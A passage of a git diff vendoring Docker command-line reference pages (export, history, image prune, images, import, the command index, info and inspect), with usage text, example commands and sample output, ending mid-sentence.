+ +## Examples + + $ docker export red_panda > latest.tar + +Or + + $ docker export --output="latest.tar" red_panda diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/history.md b/vendor/github.com/docker/docker/docs/reference/commandline/history.md new file mode 100644 index 0000000000..00f88db35b --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/history.md @@ -0,0 +1,48 @@ +--- +title: "history" +description: "The history command description and usage" +keywords: "docker, image, history" +--- + + + +# history + +```markdown +Usage: docker history [OPTIONS] IMAGE + +Show the history of an image + +Options: + --help Print usage + -H, --human Print sizes and dates in human readable format (default true) + --no-trunc Don't truncate output + -q, --quiet Only show numeric IDs +``` + +To see how the `docker:latest` image was built: + + $ docker history docker + IMAGE CREATED CREATED BY SIZE COMMENT + 3e23a5875458 8 days ago /bin/sh -c #(nop) ENV LC_ALL=C.UTF-8 0 B + 8578938dd170 8 days ago /bin/sh -c dpkg-reconfigure locales && loc 1.245 MB + be51b77efb42 8 days ago /bin/sh -c apt-get update && apt-get install 338.3 MB + 4b137612be55 6 weeks ago /bin/sh -c #(nop) ADD jessie.tar.xz in / 121 MB + 750d58736b4b 6 weeks ago /bin/sh -c #(nop) MAINTAINER Tianon Gravi + +# image prune + +```markdown +Usage: docker image prune [OPTIONS] + +Remove unused images + +Options: + -a, --all Remove all unused images, not just dangling ones + -f, --force Do not prompt for confirmation + --help Print usage +``` + +Remove all dangling images. If `-a` is specified, will also remove all images not referenced by any container. + +Example output: + +```bash +$ docker image prune -a +WARNING! This will remove all images without at least one container associated to them. +Are you sure you want to continue? 
[y/N] y +Deleted Images: +untagged: alpine:latest +untagged: alpine@sha256:3dcdb92d7432d56604d4545cbd324b14e647b313626d99b889d0626de158f73a +deleted: sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba +deleted: sha256:4fe15f8d0ae69e169824f25f1d4da3015a48feeeeebb265cd2e328e15c6a869f +untagged: alpine:3.3 +untagged: alpine@sha256:4fa633f4feff6a8f02acfc7424efd5cb3e76686ed3218abf4ca0fa4a2a358423 +untagged: my-jq:latest +deleted: sha256:ae67841be6d008a374eff7c2a974cde3934ffe9536a7dc7ce589585eddd83aff +deleted: sha256:34f6f1261650bc341eb122313372adc4512b4fceddc2a7ecbb84f0958ce5ad65 +deleted: sha256:cf4194e8d8db1cb2d117df33f2c75c0369c3a26d96725efb978cc69e046b87e7 +untagged: my-curl:latest +deleted: sha256:b2789dd875bf427de7f9f6ae001940073b3201409b14aba7e5db71f408b8569e +deleted: sha256:96daac0cb203226438989926fc34dd024f365a9a8616b93e168d303cfe4cb5e9 +deleted: sha256:5cbd97a14241c9cd83250d6b6fc0649833c4a3e84099b968dd4ba403e609945e +deleted: sha256:a0971c4015c1e898c60bf95781c6730a05b5d8a2ae6827f53837e6c9d38efdec +deleted: sha256:d8359ca3b681cc5396a4e790088441673ed3ce90ebc04de388bfcd31a0716b06 +deleted: sha256:83fc9ba8fb70e1da31dfcc3c88d093831dbd4be38b34af998df37e8ac538260c +deleted: sha256:ae7041a4cc625a9c8e6955452f7afe602b401f662671cea3613f08f3d9343b35 +deleted: sha256:35e0f43a37755b832f0bbea91a2360b025ee351d7309dae0d9737bc96b6d0809 +deleted: sha256:0af941dd29f00e4510195dd00b19671bc591e29d1495630e7e0f7c44c1e6a8c0 +deleted: sha256:9fc896fc2013da84f84e45b3096053eb084417b42e6b35ea0cce5a3529705eac +deleted: sha256:47cf20d8c26c46fff71be614d9f54997edacfe8d46d51769706e5aba94b16f2b +deleted: sha256:2c675ee9ed53425e31a13e3390bf3f539bf8637000e4bcfbb85ee03ef4d910a1 + +Total reclaimed space: 16.43 MB +``` + +## Related information + +* [system df](system_df.md) +* [container prune](container_prune.md) +* [volume prune](volume_prune.md) +* [network prune](network_prune.md) +* [system prune](system_prune.md) diff --git 
a/vendor/github.com/docker/docker/docs/reference/commandline/images.md b/vendor/github.com/docker/docker/docs/reference/commandline/images.md new file mode 100644 index 0000000000..3b9ea1fe17 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/images.md @@ -0,0 +1,304 @@ +--- +title: "images" +description: "The images command description and usage" +keywords: "list, docker, images" +--- + + + +# images + +```markdown +Usage: docker images [OPTIONS] [REPOSITORY[:TAG]] + +List images + +Options: + -a, --all Show all images (default hides intermediate images) + --digests Show digests + -f, --filter value Filter output based on conditions provided (default []) + - dangling=(true|false) + - label= or label== + - before=([:tag]||) + - since=([:tag]||) + - reference=(pattern of an image reference) + --format string Pretty-print images using a Go template + --help Print usage + --no-trunc Don't truncate output + -q, --quiet Only show numeric IDs +``` + +The default `docker images` will show all top level +images, their repository and tags, and their size. + +Docker images have intermediate layers that increase reusability, +decrease disk usage, and speed up `docker build` by +allowing each step to be cached. These intermediate layers are not shown +by default. + +The `SIZE` is the cumulative space taken up by the image and all +its parent images. This is also the disk space used by the contents of the +Tar file created when you `docker save` an image. + +An image will be listed more than once if it has multiple repository names +or tags. This single image (identifiable by its matching `IMAGE ID`) +uses up the `SIZE` listed only once. 
+ +### Listing the most recently created images + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + 77af4d6b9913 19 hours ago 1.089 GB + committ latest b6fa739cedf5 19 hours ago 1.089 GB + 78a85c484f71 19 hours ago 1.089 GB + docker latest 30557a29d5ab 20 hours ago 1.089 GB + 5ed6274db6ce 24 hours ago 1.089 GB + postgres 9 746b819f315e 4 days ago 213.4 MB + postgres 9.3 746b819f315e 4 days ago 213.4 MB + postgres 9.3.5 746b819f315e 4 days ago 213.4 MB + postgres latest 746b819f315e 4 days ago 213.4 MB + +### Listing images by name and tag + +The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument +that restricts the list to images that match the argument. If you specify +`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the +given repository. + +For example, to list all images in the "java" repository, run this command : + + $ docker images java + REPOSITORY TAG IMAGE ID CREATED SIZE + java 8 308e519aac60 6 days ago 824.5 MB + java 7 493d82594c15 3 months ago 656.3 MB + java latest 2711b1d6f3aa 5 months ago 603.9 MB + +The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, +`docker images jav` does not match the image `java`. + +If both `REPOSITORY` and `TAG` are provided, only images matching that +repository and tag are listed. To find all local images in the "java" +repository with tag "8" you can use: + + $ docker images java:8 + REPOSITORY TAG IMAGE ID CREATED SIZE + java 8 308e519aac60 6 days ago 824.5 MB + +If nothing matches `REPOSITORY[:TAG]`, the list is empty. 
+ + $ docker images java:0 + REPOSITORY TAG IMAGE ID CREATED SIZE + +## Listing the full length image IDs + + $ docker images --no-trunc + REPOSITORY TAG IMAGE ID CREATED SIZE + sha256:77af4d6b9913e693e8d0b4b294fa62ade6054e6b2f1ffb617ac955dd63fb0182 19 hours ago 1.089 GB + committest latest sha256:b6fa739cedf5ea12a620a439402b6004d057da800f91c7524b5086a5e4749c9f 19 hours ago 1.089 GB + sha256:78a85c484f71509adeaace20e72e941f6bdd2b25b4c75da8693efd9f61a37921 19 hours ago 1.089 GB + docker latest sha256:30557a29d5abc51e5f1d5b472e79b7e296f595abcf19fe6b9199dbbc809c6ff4 20 hours ago 1.089 GB + sha256:0124422dd9f9cf7ef15c0617cda3931ee68346455441d66ab8bdc5b05e9fdce5 20 hours ago 1.089 GB + sha256:18ad6fad340262ac2a636efd98a6d1f0ea775ae3d45240d3418466495a19a81b 22 hours ago 1.082 GB + sha256:f9f1e26352f0a3ba6a0ff68167559f64f3e21ff7ada60366e2d44a04befd1d3a 23 hours ago 1.089 GB + tryout latest sha256:2629d1fa0b81b222fca63371ca16cbf6a0772d07759ff80e8d1369b926940074 23 hours ago 131.5 MB + sha256:5ed6274db6ceb2397844896966ea239290555e74ef307030ebb01ff91b1914df 24 hours ago 1.089 GB + +## Listing image digests + +Images that use the v2 or later format have a content-addressable identifier +called a `digest`. As long as the input used to generate the image is +unchanged, the digest value is predictable. To list image digest values, use +the `--digests` flag: + + $ docker images --digests + REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE + localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB + +When pushing or pulling to a 2.0 registry, the `push` or `pull` command +output includes the image digest. You can `pull` using a digest value. You can +also reference by digest in `create`, `run`, and `rmi` commands, as well as the +`FROM` image reference in a Dockerfile. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". 
If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* dangling (boolean - true or false) +* label (`label=` or `label==`) +* before (`[:]`, `` or ``) - filter images created before given id or references +* since (`[:]`, `` or ``) - filter images created since given id or references + +##### Untagged images (dangling) + + $ docker images --filter "dangling=true" + + REPOSITORY TAG IMAGE ID CREATED SIZE + 8abc22fbb042 4 weeks ago 0 B + 48e5f45168b9 4 weeks ago 2.489 MB + bf747efa0e2f 4 weeks ago 0 B + 980fe10e5736 12 weeks ago 101.4 MB + dea752e4e117 12 weeks ago 101.4 MB + 511136ea3c5a 8 months ago 0 B + +This will display untagged images, that are the leaves of the images tree (not +intermediary layers). These images occur when a new build of an image takes the +`repo:tag` away from the image ID, leaving it as `:` or untagged. +A warning will be issued if trying to remove an image when a container is presently +using it. By having this flag it allows for batch cleanup. + +Ready for use by `docker rmi ...`, like: + + $ docker rmi $(docker images -f "dangling=true" -q) + + 8abc22fbb042 + 48e5f45168b9 + bf747efa0e2f + 980fe10e5736 + dea752e4e117 + 511136ea3c5a + +NOTE: Docker will warn you if any containers exist that are using these untagged images. + + +##### Labeled images + +The `label` filter matches images based on the presence of a `label` alone or a `label` and a +value. + +The following filter matches images with the `com.example.version` label regardless of its value. + + $ docker images --filter "label=com.example.version" + + REPOSITORY TAG IMAGE ID CREATED SIZE + match-me-1 latest eeae25ada2aa About a minute ago 188.3 MB + match-me-2 latest dea752e4e117 About a minute ago 188.3 MB + +The following filter matches images with the `com.example.version` label with the `1.0` value. 
+ + $ docker images --filter "label=com.example.version=1.0" + REPOSITORY TAG IMAGE ID CREATED SIZE + match-me latest 511136ea3c5a About a minute ago 188.3 MB + +In this example, with the `0.1` value, it returns an empty set because no matches were found. + + $ docker images --filter "label=com.example.version=0.1" + REPOSITORY TAG IMAGE ID CREATED SIZE + +#### Before + +The `before` filter shows only images created before the image with +given id or reference. For example, having these images: + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + image1 latest eeae25ada2aa 4 minutes ago 188.3 MB + image2 latest dea752e4e117 9 minutes ago 188.3 MB + image3 latest 511136ea3c5a 25 minutes ago 188.3 MB + +Filtering with `before` would give: + + $ docker images --filter "before=image1" + REPOSITORY TAG IMAGE ID CREATED SIZE + image2 latest dea752e4e117 9 minutes ago 188.3 MB + image3 latest 511136ea3c5a 25 minutes ago 188.3 MB + +#### Since + +The `since` filter shows only images created after the image with +given id or reference. For example, having these images: + + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + image1 latest eeae25ada2aa 4 minutes ago 188.3 MB + image2 latest dea752e4e117 9 minutes ago 188.3 MB + image3 latest 511136ea3c5a 25 minutes ago 188.3 MB + +Filtering with `since` would give: + + $ docker images --filter "since=image3" + REPOSITORY TAG IMAGE ID CREATED SIZE + image1 latest eeae25ada2aa 4 minutes ago 188.3 MB + image2 latest dea752e4e117 9 minutes ago 188.3 MB + +#### Reference + +The `reference` filter shows only images whose reference matches +the specified pattern. 
+ + $ docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox latest e02e811dd08f 5 weeks ago 1.09 MB + busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB + busybox musl 733eb3059dce 5 weeks ago 1.21 MB + busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB + +Filtering with `reference` would give: + + $ docker images --filter=reference='busy*:*libc' + REPOSITORY TAG IMAGE ID CREATED SIZE + busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB + busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB + +## Formatting + +The formatting option (`--format`) will pretty print container output +using a Go template. + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +---- | ---- +`.ID` | Image ID +`.Repository` | Image repository +`.Tag` | Image tag +`.Digest` | Image digest +`.CreatedSince` | Elapsed time since the image was created +`.CreatedAt` | Time when the image was created +`.Size` | Image disk size + +When using the `--format` option, the `image` command will either +output the data exactly as the template declares or, when using the +`table` directive, will include column headers as well. 
+ +The following example uses a template without headers and outputs the +`ID` and `Repository` entries separated by a colon for all images: + + {% raw %} + $ docker images --format "{{.ID}}: {{.Repository}}" + 77af4d6b9913: + b6fa739cedf5: committ + 78a85c484f71: + 30557a29d5ab: docker + 5ed6274db6ce: + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + 746b819f315e: postgres + {% endraw %} + +To list all images with their repository and tag in a table format you +can use: + + {% raw %} + $ docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" + IMAGE ID REPOSITORY TAG + 77af4d6b9913 + b6fa739cedf5 committ latest + 78a85c484f71 + 30557a29d5ab docker latest + 5ed6274db6ce + 746b819f315e postgres 9 + 746b819f315e postgres 9.3 + 746b819f315e postgres 9.3.5 + 746b819f315e postgres latest + {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/import.md b/vendor/github.com/docker/docker/docs/reference/commandline/import.md new file mode 100644 index 0000000000..20e90a61fd --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/import.md @@ -0,0 +1,75 @@ +--- +title: "import" +description: "The import command description and usage" +keywords: "import, file, system, container" +--- + + + +# import + +```markdown +Usage: docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]] + +Import the contents from a tarball to create a filesystem image + +Options: + -c, --change value Apply Dockerfile instruction to the created image (default []) + --help Print usage + -m, --message string Set commit message for imported image +``` + +You can specify a `URL` or `-` (dash) to take data directly from `STDIN`. The +`URL` can point to an archive (.tar, .tar.gz, .tgz, .bzip, .tar.xz, or .txz) +containing a filesystem or to an individual file on the Docker host. If you +specify an archive, Docker untars it in the container relative to the `/` +(root). 
If you specify an individual file, you must specify the full path within +the host. To import from a remote location, specify a `URI` that begins with the +`http://` or `https://` protocol. + +The `--change` option will apply `Dockerfile` instructions to the image +that is created. +Supported `Dockerfile` instructions: +`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` + +## Examples + +**Import from a remote location:** + +This will create a new untagged image. + + $ docker import http://example.com/exampleimage.tgz + +**Import from a local file:** + +Import to docker via pipe and `STDIN`. + + $ cat exampleimage.tgz | docker import - exampleimagelocal:new + +Import with a commit message. + + $ cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new + +Import to docker from a local archive. + + $ docker import /path/to/exampleimage.tgz + +**Import from a local directory:** + + $ sudo tar -c . | docker import - exampleimagedir + +**Import from a local directory with new configurations:** + + $ sudo tar -c . | docker import --change "ENV DEBUG true" - exampleimagedir + +Note the `sudo` in this example – you must preserve +the ownership of the files (especially root ownership) during the +archiving with tar. If you are not root (or the sudo command) when you +tar, then the ownerships might not get preserved. 
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/index.md b/vendor/github.com/docker/docker/docs/reference/commandline/index.md new file mode 100644 index 0000000000..952fa09df1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/index.md @@ -0,0 +1,178 @@ +--- +title: "Docker commands" +description: "Docker's CLI command description and usage" +keywords: "Docker, Docker documentation, CLI, command line" +identifier: "smn_cli_guide" +--- + + + +# The Docker commands + +This section contains reference information on using Docker's command line +client. Each command has a reference page along with samples. If you are +unfamiliar with the command line, you should start by reading about how to [Use +the Docker command line](cli.md). + +You start the Docker daemon with the command line. How you start the daemon +affects your Docker containers. For that reason you should also make sure to +read the [`dockerd`](dockerd.md) reference page. + +### Docker management commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [dockerd](dockerd.md) | Launch the Docker daemon | +| [info](info.md) | Display system-wide information | +| [inspect](inspect.md)| Return low-level information on a container or image | +| [version](version.md) | Show the Docker version information | + + +### Image commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [build](build.md) | Build an image from a Dockerfile | +| [commit](commit.md) | Create a new image from a container's changes | +| [history](history.md) | Show the history of an image | +| [images](images.md) | List images | +| [import](import.md) | Import the contents from a tarball to create a filesystem image | +| [load](load.md) | Load an image from a tar archive or STDIN | +| [rmi](rmi.md) | Remove one or more images | +| [save](save.md) | Save images to a 
tar archive | +| [tag](tag.md) | Tag an image into a repository | + +### Container commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [attach](attach.md) | Attach to a running container | +| [cp](cp.md) | Copy files/folders from a container to a HOSTDIR or to STDOUT | +| [create](create.md) | Create a new container | +| [diff](diff.md) | Inspect changes on a container's filesystem | +| [events](events.md) | Get real time events from the server | +| [exec](exec.md) | Run a command in a running container | +| [export](export.md) | Export a container's filesystem as a tar archive | +| [kill](kill.md) | Kill a running container | +| [logs](logs.md) | Fetch the logs of a container | +| [pause](pause.md) | Pause all processes within a container | +| [port](port.md) | List port mappings or a specific mapping for the container | +| [ps](ps.md) | List containers | +| [rename](rename.md) | Rename a container | +| [restart](restart.md) | Restart a running container | +| [rm](rm.md) | Remove one or more containers | +| [run](run.md) | Run a command in a new container | +| [start](start.md) | Start one or more stopped containers | +| [stats](stats.md) | Display a live stream of container(s) resource usage statistics | +| [stop](stop.md) | Stop a running container | +| [top](top.md) | Display the running processes of a container | +| [unpause](unpause.md) | Unpause all processes within a container | +| [update](update.md) | Update configuration of one or more containers | +| [wait](wait.md) | Block until a container stops, then print its exit code | + +### Hub and registry commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [login](login.md) | Register or log in to a Docker registry | +| [logout](logout.md) | Log out from a Docker registry | +| [pull](pull.md) | Pull an image or a repository from a Docker registry | +| [push](push.md) | 
Push an image or a repository to a Docker registry | +| [search](search.md) | Search the Docker Hub for images | + +### Network and connectivity commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [network connect](network_connect.md) | Connect a container to a network | +| [network create](network_create.md) | Create a new network | +| [network disconnect](network_disconnect.md) | Disconnect a container from a network | +| [network inspect](network_inspect.md) | Display information about a network | +| [network ls](network_ls.md) | Lists all the networks the Engine `daemon` knows about | +| [network rm](network_rm.md) | Removes one or more networks | + + +### Shared data volume commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [volume create](volume_create.md) | Creates a new volume where containers can consume and store data | +| [volume inspect](volume_inspect.md) | Display information about a volume | +| [volume ls](volume_ls.md) | Lists all the volumes Docker knows about | +| [volume prune](volume_prune.md) | Remove all unused volumes | +| [volume rm](volume_rm.md) | Remove one or more volumes | + + +### Swarm node commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [node promote](node_promote.md) | Promote a node that is pending a promotion to manager | +| [node demote](node_demote.md) | Demotes an existing manager so that it is no longer a manager | +| [node inspect](node_inspect.md) | Inspect a node in the swarm | +| [node update](node_update.md) | Update attributes for a node | +| [node ps](node_ps.md) | List tasks running on one or more nodes | +| [node ls](node_ls.md) | List nodes in the swarm | +| [node rm](node_rm.md) | Remove one or more nodes from the swarm | + +### Swarm swarm commands + +| Command | Description | 
+|:--------|:-------------------------------------------------------------------| +| [swarm init](swarm_init.md) | Initialize a swarm | +| [swarm join](swarm_join.md) | Join a swarm as a manager node or worker node | +| [swarm leave](swarm_leave.md) | Remove the current node from the swarm | +| [swarm update](swarm_update.md) | Update attributes of a swarm | +| [swarm join-token](swarm_join_token.md) | Display or rotate join tokens | + +### Swarm service commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [service create](service_create.md) | Create a new service | +| [service inspect](service_inspect.md) | Inspect a service | +| [service ls](service_ls.md) | List services in the swarm | +| [service rm](service_rm.md) | Remove a service from the swarm | +| [service scale](service_scale.md) | Set the number of replicas for the desired state of the service | +| [service ps](service_ps.md) | List the tasks of a service | +| [service update](service_update.md) | Update the attributes of a service | + +### Swarm secret commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [secret create](secret_create.md) | Create a secret from a file or STDIN as content | +| [secret inspect](secret_inspect.md) | Inspect the specified secret | +| [secret ls](secret_ls.md) | List secrets in the swarm | +| [secret rm](secret_rm.md) | Remove the specified secrets from the swarm | + +### Swarm stack commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [stack deploy](stack_deploy.md) | Deploy a new stack or update an existing stack | +| [stack ls](stack_ls.md) | List stacks in the swarm | +| [stack ps](stack_ps.md) | List the tasks in the stack | +| [stack rm](stack_rm.md) | Remove the stack from the swarm | +| [stack services](stack_services.md) | List the services in the stack | + 
+### Plugin commands + +| Command | Description | +|:--------|:-------------------------------------------------------------------| +| [plugin create](plugin_create.md) | Create a plugin from a rootfs and configuration | +| [plugin disable](plugin_disable.md) | Disable a plugin | +| [plugin enable](plugin_enable.md) | Enable a plugin | +| [plugin inspect](plugin_inspect.md) | Display detailed information on a plugin | +| [plugin install](plugin_install.md) | Install a plugin | +| [plugin ls](plugin_ls.md) | List plugins | +| [plugin push](plugin_push.md) | Push a plugin to a registry | +| [plugin rm](plugin_rm.md) | Remove a plugin | +| [plugin set](plugin_set.md) | Change settings for a plugin | diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/info.md b/vendor/github.com/docker/docker/docs/reference/commandline/info.md new file mode 100644 index 0000000000..50a084fcb2 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/info.md @@ -0,0 +1,224 @@ +--- +title: "info" +description: "The info command description and usage" +keywords: "display, docker, information" +--- + + + +# info + +```markdown +Usage: docker info [OPTIONS] + +Display system-wide information + +Options: + -f, --format string Format the output using the given Go template + --help Print usage +``` + +This command displays system wide information regarding the Docker installation. +Information displayed includes the kernel version, number of containers and images. +The number of images shown is the number of unique images. The same image tagged +under different names is counted only once. + +If a format is specified, the given template will be executed instead of the +default format. Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. 
+ +Depending on the storage driver in use, additional information can be shown, such +as pool name, data file, metadata file, data space used, total data space, metadata +space used, and total metadata space. + +The data file is where the images are stored and the metadata file is where the +meta data regarding those images are stored. When run for the first time Docker +allocates a certain amount of data space and meta data space from the space +available on the volume where `/var/lib/docker` is mounted. + +# Examples + +## Display Docker system information + +Here is a sample output for a daemon running on Ubuntu, using the overlay2 +storage driver and a node that is part of a 2-node swarm: + + $ docker -D info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Images: 52 + Server Version: 1.13.0 + Storage Driver: overlay2 + Backing Filesystem: extfs + Supports d_type: true + Native Overlay Diff: false + Logging Driver: json-file + Cgroup Driver: cgroupfs + Plugins: + Volume: local + Network: bridge host macvlan null overlay + Swarm: active + NodeID: rdjq45w1op418waxlairloqbm + Is Manager: true + ClusterID: te8kdyw33n36fqiz74bfjeixd + Managers: 1 + Nodes: 2 + Orchestration: + Task History Retention Limit: 5 + Raft: + Snapshot Interval: 10000 + Number of Old Snapshots to Retain: 0 + Heartbeat Tick: 1 + Election Tick: 3 + Dispatcher: + Heartbeat Period: 5 seconds + CA Configuration: + Expiry Duration: 3 months + Node Address: 172.16.66.128 172.16.66.129 + Manager Addresses: + 172.16.66.128:2477 + Runtimes: runc + Default Runtime: runc + Init Binary: docker-init + containerd version: 8517738ba4b82aff5662c97ca4627e7e4d03b531 + runc version: ac031b5bf1cc92239461125f4c1ffb760522bbf2 + init version: N/A (expected: v0.13.0) + Security Options: + apparmor + seccomp + Profile: default + Kernel Version: 4.4.0-31-generic + Operating System: Ubuntu 16.04.1 LTS + OSType: linux + Architecture: x86_64 + CPUs: 2 + Total Memory: 1.937 GiB + Name: ubuntu + ID: 
H52R:7ZR6:EIIA:76JG:ORIY:BVKF:GSFU:HNPG:B5MK:APSC:SZ3Q:N326 + Docker Root Dir: /var/lib/docker + Debug Mode (client): true + Debug Mode (server): true + File Descriptors: 30 + Goroutines: 123 + System Time: 2016-11-12T17:24:37.955404361-08:00 + EventsListeners: 0 + Http Proxy: http://test:test@proxy.example.com:8080 + Https Proxy: https://test:test@proxy.example.com:8080 + No Proxy: localhost,127.0.0.1,docker-registry.somecorporation.com + Registry: https://index.docker.io/v1/ + WARNING: No swap limit support + Labels: + storage=ssd + staging=true + Experimental: false + Insecure Registries: + 127.0.0.0/8 + Registry Mirrors: + http://192.168.1.2/ + http://registry-mirror.example.com:5000/ + Live Restore Enabled: false + +The global `-D` option tells all `docker` commands to output debug information. + +The example below shows the output for a daemon running on Red Hat Enterprise Linux, +using the devicemapper storage driver. As can be seen in the output, additional +information about the devicemapper storage driver is shown: + + $ docker info + Containers: 14 + Running: 3 + Paused: 1 + Stopped: 10 + Images: 52 + Server Version: 1.10.3 + Storage Driver: devicemapper + Pool Name: docker-202:2-25583803-pool + Pool Blocksize: 65.54 kB + Base Device Size: 10.74 GB + Backing Filesystem: xfs + Data file: /dev/loop0 + Metadata file: /dev/loop1 + Data Space Used: 1.68 GB + Data Space Total: 107.4 GB + Data Space Available: 7.548 GB + Metadata Space Used: 2.322 MB + Metadata Space Total: 2.147 GB + Metadata Space Available: 2.145 GB + Udev Sync Supported: true + Deferred Removal Enabled: false + Deferred Deletion Enabled: false + Deferred Deleted Device Count: 0 + Data loop file: /var/lib/docker/devicemapper/devicemapper/data + Metadata loop file: /var/lib/docker/devicemapper/devicemapper/metadata + Library Version: 1.02.107-RHEL7 (2015-12-01) + Execution Driver: native-0.2 + Logging Driver: json-file + Plugins: + Volume: local + Network: null host bridge + Kernel Version: 
3.10.0-327.el7.x86_64 + Operating System: Red Hat Enterprise Linux Server 7.2 (Maipo) + OSType: linux + Architecture: x86_64 + CPUs: 1 + Total Memory: 991.7 MiB + Name: ip-172-30-0-91.ec2.internal + ID: I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S + Docker Root Dir: /var/lib/docker + Debug mode (client): false + Debug mode (server): false + Username: gordontheturtle + Registry: https://index.docker.io/v1/ + Insecure registries: + myinsecurehost:5000 + 127.0.0.0/8 + +You can also specify the output format: + + $ docker info --format '{{json .}}' + {"ID":"I54V:OLXT:HVMM:TPKO:JPHQ:CQCD:JNLC:O3BZ:4ZVJ:43XJ:PFHZ:6N2S","Containers":14, ...} + +Here is a sample output for a daemon running on Windows Server 2016: + + E:\docker>docker info + Containers: 1 + Running: 0 + Paused: 0 + Stopped: 1 + Images: 17 + Server Version: 1.13.0 + Storage Driver: windowsfilter + Windows: + Logging Driver: json-file + Plugins: + Volume: local + Network: nat null overlay + Swarm: inactive + Default Isolation: process + Kernel Version: 10.0 14393 (14393.206.amd64fre.rs1_release.160912-1937) + Operating System: Windows Server 2016 Datacenter + OSType: windows + Architecture: x86_64 + CPUs: 8 + Total Memory: 3.999 GiB + Name: WIN-V0V70C0LU5P + ID: NYMS:B5VK:UMSL:FVDZ:EWB5:FKVK:LPFL:FJMQ:H6FT:BZJ6:L2TD:XH62 + Docker Root Dir: C:\control + Debug Mode (client): false + Debug Mode (server): false + Registry: https://index.docker.io/v1/ + Insecure Registries: + 127.0.0.0/8 + Registry Mirrors: + http://192.168.1.2/ + http://registry-mirror.example.com:5000/ + Live Restore Enabled: false diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md new file mode 100644 index 0000000000..7a0c3a0871 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/inspect.md @@ -0,0 +1,102 @@ +--- +title: "inspect" +description: "The inspect command description and usage" +keywords: 
"inspect, container, json" +--- + + + +# inspect + +```markdown +Usage: docker inspect [OPTIONS] NAME|ID [NAME|ID...] + +Return low-level information on Docker object(s) (e.g. container, image, volume, +network, node, service, or task) identified by name or ID + +Options: + -f, --format Format the output using the given Go template + --help Print usage + -s, --size Display total file sizes if the type is container + --type Return JSON for specified type +``` + +By default, this will render all results in a JSON array. If the container and +image have the same name, this will return container JSON for unspecified type. +If a format is specified, the given template will be executed for each result. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +## Examples + +**Get an instance's IP address:** + +For the most part, you can pick out any field from the JSON in a fairly +straightforward manner. + + {% raw %} + $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' $INSTANCE_ID + {% endraw %} + +**Get an instance's MAC address:** + +For the most part, you can pick out any field from the JSON in a fairly +straightforward manner. 
+ + {% raw %} + $ docker inspect --format='{{range .NetworkSettings.Networks}}{{.MacAddress}}{{end}}' $INSTANCE_ID + {% endraw %} + +**Get an instance's log path:** + + {% raw %} + $ docker inspect --format='{{.LogPath}}' $INSTANCE_ID + {% endraw %} + +**Get a Task's image name:** + + {% raw %} + $ docker inspect --format='{{.Container.Spec.Image}}' $INSTANCE_ID + {% endraw %} + +**List all port bindings:** + +One can loop over arrays and maps in the results to produce simple text +output: + + {% raw %} + $ docker inspect --format='{{range $p, $conf := .NetworkSettings.Ports}} {{$p}} -> {{(index $conf 0).HostPort}} {{end}}' $INSTANCE_ID + {% endraw %} + +**Find a specific port mapping:** + +The `.Field` syntax doesn't work when the field name begins with a +number, but the template language's `index` function does. The +`.NetworkSettings.Ports` section contains a map of the internal port +mappings to a list of external address/port objects. To grab just the +numeric public port, you use `index` to find the specific port map, and +then `index` 0 contains the first object inside of that. Then we ask for +the `HostPort` field to get the public address. + + {% raw %} + $ docker inspect --format='{{(index (index .NetworkSettings.Ports "8787/tcp") 0).HostPort}}' $INSTANCE_ID + {% endraw %} + +**Get a subsection in JSON format:** + +If you request a field which is itself a structure containing other 